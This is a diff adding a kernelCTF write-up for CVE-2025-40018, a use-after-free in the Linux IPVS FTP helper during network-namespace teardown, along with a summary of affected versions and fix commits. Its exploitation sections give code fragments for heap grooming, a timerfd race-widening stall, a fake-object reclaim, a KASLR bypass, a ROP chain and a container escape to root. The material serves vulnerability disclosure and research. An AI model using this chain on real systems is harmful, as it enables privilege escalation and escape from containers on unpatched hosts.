274 changes: 274 additions & 0 deletions pocs/linux/kernelctf/CVE-2025-40018_cos/docs/exploit.md
@@ -0,0 +1,274 @@
## 1. Overview

The vulnerability is a Use-After-Free (UAF) in the IP Virtual Server (IPVS) FTP helper module (`ip_vs_ftp`), in its per-network-namespace exit path. During network namespace cleanup, the FTP application structure is freed while active connections still reference it; the later connection flush then dereferences the freed object.

## 2. Root Cause Analysis

### 2.1. Module Exit and Application Free

When a network namespace is destroyed, the kernel iterates through the exit handlers of all registered per-netns subsystems. The `ip_vs_ftp` module registers its exit handler, `__ip_vs_ftp_exit()`, which is executed before the core IPVS cleanup handler.

In `__ip_vs_ftp_exit()`, the `unregister_ip_vs_app()` function is called to remove the FTP application.

```c
static void __ip_vs_ftp_exit(struct net *net)
{
    struct netns_ipvs *ipvs = net_ipvs(net);
    // [...]
    unregister_ip_vs_app(ipvs, &ip_vs_ftp);
}
```

Inside `unregister_ip_vs_app()`, the `struct ip_vs_app` object representing the application template (variable `a`) is freed immediately using `kfree(a)` [1].

The incarnations (`inc`) are also released, via `ip_vs_app_inc_release()` [2], but that path defers the free with `call_rcu`. As a result, `inc` itself remains valid during the subsequent RCU-protected connection flush, yet it still holds a pointer (`inc->app`) to the template `a`, which has already been freed. `inc->app` is therefore a dangling pointer, and `a` is the victim object for exploitation.

```c
void unregister_ip_vs_app(struct netns_ipvs *ipvs, struct ip_vs_app *app)
{
    struct ip_vs_app *a, *anxt, *inc, *nxt;
    mutex_lock(&__ip_vs_app_mutex);

    list_for_each_entry_safe(a, anxt, &ipvs->app_list, a_list) {
        // [...]
        list_for_each_entry_safe(inc, nxt, &a->incs_list, a_list) {
            ip_vs_app_inc_release(ipvs, inc); // [2]
        }

        list_del(&a->a_list);
        kfree(a); // [1] The application template is freed immediately!
        // [...]
    }
    mutex_unlock(&__ip_vs_app_mutex);
}
```

### 2.2. Connection Cleanup and UAF

Following the execution of `__ip_vs_ftp_exit()`, the core IPVS cleanup handler `__ip_vs_cleanup_batch()` runs. This function flushes all remaining connections in the namespace.

```c
static void __net_exit __ip_vs_cleanup_batch(struct list_head *net_list)
{
    // [...]
    list_for_each_entry(net, net_list, exit_list) {
        ipvs = net_ipvs(net);
        ip_vs_conn_net_cleanup(ipvs); // [3] Flushes connections
        // [...]
    }
}
```

The connection flush path eventually reaches `ip_vs_unbind_app()`, which attempts to decrement the reference count of the application associated with the connection.

```c
void ip_vs_unbind_app(struct ip_vs_conn *cp)
{
    struct ip_vs_app *inc = cp->app;
    // [...]
    ip_vs_app_inc_put(inc); // [4]
    cp->app = NULL;
}
```

`ip_vs_app_inc_put()` decrements the incarnation's use count and then calls `ip_vs_app_put()` on the parent application.

```c
void ip_vs_app_inc_put(struct ip_vs_app *inc)
{
    atomic_dec(&inc->usecnt);
    ip_vs_app_put(inc->app); // [5] Accesses inc->app (which is 'a' from [1])
}

static inline void ip_vs_app_put(struct ip_vs_app *app)
{
    module_put(app->module); // [6] UAF: Dereferences app->module
}
```

The vulnerability manifests at [6]. The pointer `app` refers to the object `a` that was freed at [1]. Dereferencing `app->module` constitutes a Use-After-Free.
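The ordering problem can be illustrated with a small user-space model. This is only a sketch: the `toy_*` names and struct fields are invented for illustration, and a `freed` flag stands in for `kfree()` so the model itself stays memory-safe. It shows that a stale access occurs only when the FTP exit handler runs before the connection flush.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Toy stand-ins for the kernel objects; all fields are invented for illustration. */
struct toy_app {
    bool freed;            /* set instead of calling free(), so the model stays safe */
    int usecnt;
    struct toy_app *app;   /* incarnation -> template back-pointer (inc->app) */
};

struct toy_conn {
    struct toy_app *app;   /* connection -> incarnation (cp->app) */
};

/* Models unregister_ip_vs_app(): the template is released immediately. */
static void toy_unregister(struct toy_app *tmpl)
{
    tmpl->freed = true;
}

/* Models ip_vs_unbind_app(); returns true if the put touched a released template. */
static bool toy_unbind(struct toy_conn *cp)
{
    struct toy_app *inc = cp->app;
    bool stale;

    if (inc == NULL)
        return false;
    inc->usecnt--;
    stale = inc->app->freed;   /* stands in for module_put(inc->app->module) */
    cp->app = NULL;
    return stale;
}

/* Runs both teardown steps in the given order; reports whether a stale access occurred. */
static bool toy_teardown(bool ftp_exit_first)
{
    struct toy_app tmpl = { .freed = false, .usecnt = 0, .app = NULL };
    struct toy_app inc = { .freed = false, .usecnt = 1, .app = &tmpl };
    struct toy_conn cp = { .app = &inc };
    bool stale;

    if (ftp_exit_first) {
        toy_unregister(&tmpl);      /* __ip_vs_ftp_exit() runs first */
        stale = toy_unbind(&cp);    /* connection flush runs second */
    } else {
        stale = toy_unbind(&cp);
        toy_unregister(&tmpl);
    }
    assert(cp.app == NULL && inc.usecnt == 0);
    return stale;
}
```

In this model, `toy_teardown(true)` reports a stale access, while `toy_teardown(false)` (connections flushed before the template is released) does not.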

### 2.3. The Race Window

The vulnerability is a deterministic Use-After-Free where the object is freed and used in the same kernel thread. To exploit it, we must artificially create a race condition to reclaim the memory between these two events.

#### Normal Execution

In a normal scenario:

```
CPU 0 (netns cleanup kthread)
-----------------------------
__ip_vs_ftp_exit()
  kfree(app)  // [Free]

__ip_vs_cleanup_batch()
  ip_vs_conn_net_cleanup()
    ip_vs_unbind_app()
      ip_vs_app_put(app)
        module_put(app->module)  // [UAF] - Dereferencing freed memory
```

#### Exploitation (Winning the Race)

The exploit uses a timer interrupt to stall CPU 0, allowing CPU 1 to reclaim the freed object:

```
CPU 0 (netns cleanup kthread)              CPU 1 (Spray Thread)
-----------------------------              --------------------
__ip_vs_ftp_exit()
  kfree(app)  // [Free]

< TimerFD Interrupt Fires >
< HardIRQ -> SoftIRQ >
< Stall: Churning huge waitqueue >
                                           Spray user_key_payload
                                             // [Reclaim] 'app' slot allocated
                                             // Fake object written

< Cleanup Resumes >
__ip_vs_cleanup_batch()
  ip_vs_conn_net_cleanup()
    ip_vs_unbind_app()
      ip_vs_app_put(app)
        module_put(app->module)  // [UAF] - Dec(controlled addr)
```

## 3. Exploitation

### 3.1. Primitive

The UAF primitive allows us to perform an **Arbitrary Address Decrement**.
When `module_put(app->module)` is called on the reclaimed fake object:
1. We control `app->module`. We set it to `TARGET_ADDR - offsetof(struct module, refcnt)`.
2. `module_put()` executes `atomic_dec_if_positive(&module->refcnt)`.
3. This decrements the 32-bit value at `TARGET_ADDR` by one, provided that value is positive when read as a signed integer.

We use this primitive to corrupt the `next` pointer of a `msg_msg` object, creating overlapping chunks on the kernel heap.
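The pointer arithmetic behind the primitive can be sketched in user space. This is a minimal model under stated assumptions: `struct toy_module` and its `0x40` offset are hypothetical (the real `struct module` layout is build-specific), and `dec_if_positive()` is a non-atomic stand-in for the kernel's `atomic_dec_if_positive()`, which is what `module_put()` uses on the reference count.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

/* Hypothetical layout: only the existence of a refcnt field matters here. */
struct toy_module {
    char pad[0x40];
    int32_t refcnt;
};

/* Value to plant in the fake app->module so that &module->refcnt == target. */
static uintptr_t fake_module_ptr(uintptr_t target)
{
    assert(target >= offsetof(struct toy_module, refcnt));
    return target - offsetof(struct toy_module, refcnt);
}

/* Non-atomic stand-in for atomic_dec_if_positive(); returns 1 if it decremented. */
static int dec_if_positive(int32_t *v)
{
    if (*v <= 0)
        return 0;
    (*v)--;
    return 1;
}

/* Stand-in for module_put(): decrements the counter inside the supplied module. */
static void toy_module_put(struct toy_module *m)
{
    if (m != NULL)
        dec_if_positive(&m->refcnt);
}

/* Plants a counter inside a heap arena, aims a fake module pointer at it,
 * and returns the counter's value after one toy_module_put(). */
static int32_t demo_arbitrary_decrement(int32_t initial)
{
    unsigned char *arena = calloc(1, 0x100);
    int32_t *target;
    int32_t result;

    assert(arena != NULL);
    target = (int32_t *)(arena + 0x44);   /* fake module then starts at arena + 4 */
    *target = initial;
    toy_module_put((struct toy_module *)fake_module_ptr((uintptr_t)target));
    result = *target;
    free(arena);
    return result;
}
```

With these definitions, a positive counter drops by one per call, while a zero or negative value is left untouched. That constraint applies to whatever 32-bit word the primitive is aimed at.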

### 3.2. Triggering the Vulnerability

The exploitation involves two main components:
1. **Cleaner Thread (CPU 0):** The kernel worker thread processing `cleanup_net`. This thread performs the Free and the Use.
2. **Sprayer Thread (CPU 1):** The attacker thread running on a separate CPU. This thread handles heap grooming and the reclamation spray.

#### 3.2.1. Heap Grooming (CPU 1)

We target the `kmalloc-256` cache where `struct ip_vs_app` resides.
1. **Spray `pg_vec`:** We spray `pg_vec` to fill slabs on CPU 1.
2. **Create Holes:** We close specific sockets to create free slots for the victim object.
3. **Allocate Victim:** We trigger `unshare(CLONE_NEWNET)` to allocate the `ip_vs_ftp` application into one of our prepared slots on CPU 1.
4. **Cross-CPU Slab Freeze:** We free an *additional* object in the victim's slab. This transitions the slab from "Full" to "Partial" on CPU 1.

**Why Freeze?** When `kfree(app)` runs on CPU 0, the object is returned to its owning slab. Because that slab is already on CPU 1's partial list, CPU 1 can immediately reallocate from it. Without this step before the netns exits, the object would instead be freed into a per-CPU cache on CPU 0 during `cleanup_net()`, making it impossible for CPU 1 to reclaim.

```c
static void freeze_victim_slab(void) {
    // Free one object per slab to transition FULL -> PARTIAL on CPU 1
    for (int i = 0; i < PACKET_SPRAY_CNT; i += KMALLOC_256_OBJS_PER_SLAB) {
        close(packet_fds[i + SLOTS_PER_SLAB]);
        packet_fds[i + SLOTS_PER_SLAB] = -1;
    }
}
```
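The freeze rule described above can be restated as a deliberately simplified model. This is not how SLUB is implemented; it encodes only the claim made in this section (a full slab is picked up by whichever CPU frees into it first, while an already-partial slab stays where it is). All `toy_*` names and the 16-object slab size are assumptions for illustration.

```c
#include <assert.h>
#include <stdbool.h>

enum toy_cpu { CPU0 = 0, CPU1 = 1 };

#define TOY_OBJS_PER_SLAB 16   /* placeholder; the real count depends on the build */

struct toy_slab {
    int inuse;               /* objects currently allocated */
    bool on_partial_list;    /* already tracked on some CPU's partial list? */
    enum toy_cpu list_cpu;   /* which CPU's partial list tracks it */
};

/* Frees one object from `freeing_cpu`. A full slab is on no partial list,
 * so the first free decides which CPU picks it up; later frees do not move it. */
static void toy_kfree(struct toy_slab *s, enum toy_cpu freeing_cpu)
{
    assert(s->inuse > 0);
    if (!s->on_partial_list) {
        s->on_partial_list = true;   /* FULL -> PARTIAL */
        s->list_cpu = freeing_cpu;
    }
    s->inuse--;
}

/* Returns the CPU that can reallocate the victim slot after the cleanup
 * worker frees it on CPU 0, with or without the freeze step. */
static enum toy_cpu victim_reclaimable_on(bool freeze_first)
{
    struct toy_slab s = {
        .inuse = TOY_OBJS_PER_SLAB,
        .on_partial_list = false,
        .list_cpu = CPU1,
    };

    if (freeze_first)
        toy_kfree(&s, CPU1);   /* attacker frees a neighbour object from CPU 1 */
    toy_kfree(&s, CPU0);       /* kfree(a) in the netns cleanup worker */
    return s.list_cpu;
}
```

In this model, `victim_reclaimable_on(true)` yields `CPU1` and `victim_reclaimable_on(false)` yields `CPU0`, which is the difference the freeze step is meant to make.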

#### 3.2.2. Binding the Vulnerable Object

To trigger the UAF, we must create a dependency between a persistent `ip_vs_conn` and the victim object (`ip_vs_app`).

The exploit sets up an IPVS service on port 21 (FTP) and establishes a TCP connection to it. When the connection is created in `ip_vs_conn_new()`, the kernel checks if the protocol has any registered applications. Since `ip_vs_ftp` is registered for port 21, the connection is automatically bound to the FTP application incarnation.

```c
// net/netfilter/ipvs/ip_vs_conn.c
struct ip_vs_conn *
ip_vs_conn_new(...)
{
    // ...
    if (unlikely(pd && atomic_read(&pd->appcnt)))
        ip_vs_bind_app(cp, pd->pp);
    // ...
}

// net/netfilter/ipvs/ip_vs_proto_tcp.c
static int
tcp_app_conn_bind(struct ip_vs_conn *cp)
{
    // ...
    list_for_each_entry_rcu(inc, &ipvs->tcp_apps[hash], p_list) {
        if (inc->port == cp->vport) {
            // ...
            cp->app = inc; // [1] Connection bound to FTP incarnation
            // ...
        }
    }
    return result;
}
```

This binding (`cp->app`) is critical. When the namespace is destroyed, `ip_vs_conn_flush()` cleans up this connection and accesses `cp->app->app`, the object that has just been freed by `__ip_vs_ftp_exit()`.

#### 3.2.3. Extending the Race Window (Timerfd Storm)

To reclaim the object between the Free and the Use on CPU 0, we employ a technique that transforms a tiny kernel race window into a large, reliably hittable target by racing against a hardware timer.

1. **Timerfd:** We create a `timerfd` and arm it to fire *exactly* when the cleanup thread is executing the critical section on CPU 0.
2. **Waitqueue Churn:** We attach thousands of `epoll` instances to this `timerfd`. When the timer expires, the hardware raises an interrupt on CPU 0. The interrupt handler wakes up all waiters on the `timerfd`. Because we have attached a massive number of `epoll` entries, the kernel is forced to churn through this list.
3. **The Stall:** This massive "thundering herd" effectively stalls the execution of the cleanup thread on CPU 0 for milliseconds, turning a microsecond-scale race into a stable, millisecond-scale window.

```c
tfd = SYSCHK(timerfd_create(CLOCK_MONOTONIC, 0));
do_epoll_enqueue(tfd, 17); // Enqueue thousands of epoll items

// ... inside the race loop ...
// Arm timer to fire just as cleanup_net starts
timerfd_settime(tfd, TFD_TIMER_CANCEL_ON_SET, &new, NULL);
```
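The body of `do_epoll_enqueue()` is not shown in this document. The following is a hypothetical sketch of how many waitqueue entries can be attached to a single `timerfd` using standard Linux calls: each `dup()` of the timer descriptor can be registered separately with `epoll_ctl()`, and every registration adds one waiter on the same underlying file. The helper name, its parameters, and the counts are assumptions, not the exploit's actual code.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <stddef.h>
#include <sys/epoll.h>
#include <sys/timerfd.h>
#include <unistd.h>

/* Hypothetical helper: registers `dups` duplicates of `tfd` on each of
 * `n_epolls` fresh epoll instances. Returns the number of registrations
 * created, or -1 on error. Descriptors are intentionally left open so the
 * waiters stay attached; epoll fds are stored in `epfds_out` if non-NULL. */
static int enqueue_epoll_waiters(int tfd, int n_epolls, int dups, int *epfds_out)
{
    int total = 0;

    assert(n_epolls > 0 && dups > 0);
    for (int i = 0; i < n_epolls; i++) {
        int epfd = epoll_create1(0);

        if (epfd < 0)
            return -1;
        for (int j = 0; j < dups; j++) {
            struct epoll_event ev = { .events = EPOLLIN };
            int fd = dup(tfd);   /* same file, distinct descriptor */

            if (fd < 0)
                return -1;
            ev.data.fd = fd;
            if (epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &ev) < 0)
                return -1;
            total++;
        }
        if (epfds_out != NULL)
            epfds_out[i] = epfd;
    }
    return total;
}
```

The number of waiters is bounded by the process's open-file limit, so a real run would need that limit raised or the work spread across processes. Those details are outside this sketch.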

#### 3.2.4. Reclaiming with `user_key_payload`

While CPU 0 is stalled, CPU 1 continuously sprays `user_key_payload` objects using `add_key()`. These objects fit in `kmalloc-256` and allow us to write arbitrary data into the freed object.

```c
void *spray_job(void *arg) {
    bind_to_cpu(1);
    while (1) {
        // ... synchronization ...
        spray_userkey(); // Reclaim the freed slot
        // ... synchronization ...
        cleanup_userkey();
    }
}
```

We craft the payload to fake `struct ip_vs_app`, setting the `module` pointer to target our `msg_msg` object.

```c
static inline void set_dec_addr(uint64_t target) {
    char *fake_ip_vs_app = user_key_payload;
    // Point app->module to (Target Address - refcnt_offset)
    *(uint64_t *)&fake_ip_vs_app[IP_VS_APP_OFFSETS_MODULE] = target - MODULE_OFFSETS_REFCNT;
}
```
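When building such a payload, note that the kernel prepends its own `user_key_payload` header to the user-supplied data, so an offset inside the reclaimed object is not the same as an offset inside the buffer passed to `add_key()`. The sketch below illustrates the translation. The 24-byte header size and the 193 to 256 byte range for `kmalloc-256` are assumptions for a typical x86_64 build, the helper names are hypothetical, and it is not shown here whether the exploit's `IP_VS_APP_OFFSETS_MODULE` constant already accounts for the header.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Assumed values for a typical x86_64 build; verify against the target kernel. */
#define KEY_HDR_SIZE   24u    /* struct user_key_payload header before data[] */
#define SLOT_SIZE      256u   /* kmalloc-256 object size */
#define PREV_SLOT_SIZE 192u   /* next smaller cache (kmalloc-192) */

/* True if a key with `datalen` bytes of user data is served from kmalloc-256. */
static int key_fits_kmalloc_256(size_t datalen)
{
    size_t total = KEY_HDR_SIZE + datalen;

    return total > PREV_SLOT_SIZE && total <= SLOT_SIZE;
}

/* Writes `value` into the user data so that it appears at byte offset
 * `obj_off` of the reclaimed object. Returns 0 on success, or -1 if the
 * field falls inside the uncontrolled header or outside the data. */
static int place_in_object(uint8_t *data, size_t datalen,
                           size_t obj_off, uint64_t value)
{
    assert(data != NULL);
    if (obj_off < KEY_HDR_SIZE ||
        obj_off - KEY_HDR_SIZE + sizeof(value) > datalen)
        return -1;
    memcpy(data + (obj_off - KEY_HDR_SIZE), &value, sizeof(value));
    return 0;
}
```

One consequence of this layout is that fields within the first `KEY_HDR_SIZE` bytes of the fake object cannot be controlled through the key data, so the technique only works when the targeted field lies beyond the header.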

### 3.3. Bypass KASLR

The vulnerability primitive does not provide a way to leak kernel addresses and is only exploitable when a valid kernel text address is known, as setting the `module` pointer requires it.

To address this, we use EntryBleed, a time-based side-channel attack, to leak the kernel base address. More details can be found at https://www.willsroot.io/2022/12/entrybleed.html or other kernelCTF submissions.

### 3.4. Privilege Escalation (Msg_msg Overlap)

1. **Heap Spray:** We spray ~1.37 GB of `msg_msg` objects to land one at a predictable physical address (`GUESSED_MSG_ADDR`).
2. **Corrupt `next`:** The UAF primitive decrements the `next` pointer of a message header. This causes it to point to a previous message's segment, creating two overlapping `msg_msgseg` objects.
3. **UAF on `pipe_buffer`:**
* We free the *first* overlapping segment (victim).
* We spray `pipe_buffer` objects, which are allocated into the now-freed slot.
* We free the *second* overlapping segment (target). Since they overlap, this frees the memory occupied by the `pipe_buffer`, creating a Use-After-Free condition on the `pipe_buffer` object.
4. **ROP Chain:**
* We spray `msg_msgseg` objects again to reclaim the freed `pipe_buffer` slot with controlled data.
* We overwrite the `pipe_buffer->ops` pointer with a fake vtable pointing to our gadgets.
* Triggering `pipe_release()` (by closing the pipe) invokes the fake release function, pivoting the stack to execute the ROP chain.

### 3.5. Container Escape

The exploit runs inside a container. The ROP chain includes a call to `switch_task_namespaces(init_nsproxy)` to switch the process back to the host's initial namespace, effectively breaking out of the container before spawning a root shell.
36 changes: 36 additions & 0 deletions pocs/linux/kernelctf/CVE-2025-40018_cos/docs/vulnerability.md
@@ -0,0 +1,36 @@
# Vulnerability
The vulnerability is a Use-After-Free (UAF) issue in the IPVS subsystem caused by incorrect cleanup ordering during network namespace destruction. The FTP application helper (`ip_vs_ftp`) frees its application structure (`struct ip_vs_app`) in its exit handler `__ip_vs_ftp_exit`, which runs before the core IPVS cleanup handler `__ip_vs_cleanup_batch`. When `__ip_vs_cleanup_batch` subsequently flushes active connections, it dereferences the now-freed application structure via `cp->app->app`, leading to a UAF.

## Requirements to trigger the vulnerability
- Capabilities: CAP_NET_ADMIN
- Kernel configuration: CONFIG_NETFILTER, CONFIG_IP_VS, CONFIG_IP_VS_FTP
- User namespaces needed: Yes

## Commit which introduced the vulnerability
- [61b1ab4583e275af216c8454b9256de680499b19](https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=61b1ab4583e275af216c8454b9256de680499b19)

## Commit which fixed the vulnerability
- Fixed in 5.4.301 with commit [8a6ecab3847c213ce2855b0378e63ce839085de3](https://web.git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=8a6ecab3847c213ce2855b0378e63ce839085de3)
- Fixed in 5.10.246 with commit [421b1ae1574dfdda68b835c15ac4921ec0030182](https://web.git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=421b1ae1574dfdda68b835c15ac4921ec0030182)
- Fixed in 5.15.195 with commit [1d79471414d7b9424d699afff2aa79fff322f52d](https://web.git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=1d79471414d7b9424d699afff2aa79fff322f52d)
- Fixed in 6.1.156 with commit [53717f8a4347b78eac6488072ad8e5adbaff38d9](https://web.git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=53717f8a4347b78eac6488072ad8e5adbaff38d9)
- Fixed in 6.6.112 with commit [8cbe2a21d85727b66d7c591fd5d83df0d8c4f757](https://web.git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=8cbe2a21d85727b66d7c591fd5d83df0d8c4f757)
- Fixed in 6.12.53 with commit [dc1a481359a72ee7e548f1f5da671282a7c13b8f](https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=dc1a481359a72ee7e548f1f5da671282a7c13b8f)
- Fixed in 6.17.3 with commit [a343811ef138a265407167294275201621e9ebb2](https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=a343811ef138a265407167294275201621e9ebb2)
- Fixed in 6.18-rc1 with commit [134121bfd99a06d44ef5ba15a9beb075297c0821](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=134121bfd99a06d44ef5ba15a9beb075297c0821)

## Affected kernel versions
- 5.4.0 - 5.4.300
- 5.10.0 - 5.10.245
- 5.15.0 - 5.15.194
- 6.1.0 - 6.1.155
- 6.6.0 - 6.6.111
- 6.12.0 - 6.12.52
- 6.17.0 - 6.17.2

## Affected component, subsystem
- Netfilter
- IPVS

## Cause
- Use-After-Free
@@ -0,0 +1,2 @@
exploit: exploit.c
	gcc $^ -pthread -static -o $@
Binary file not shown.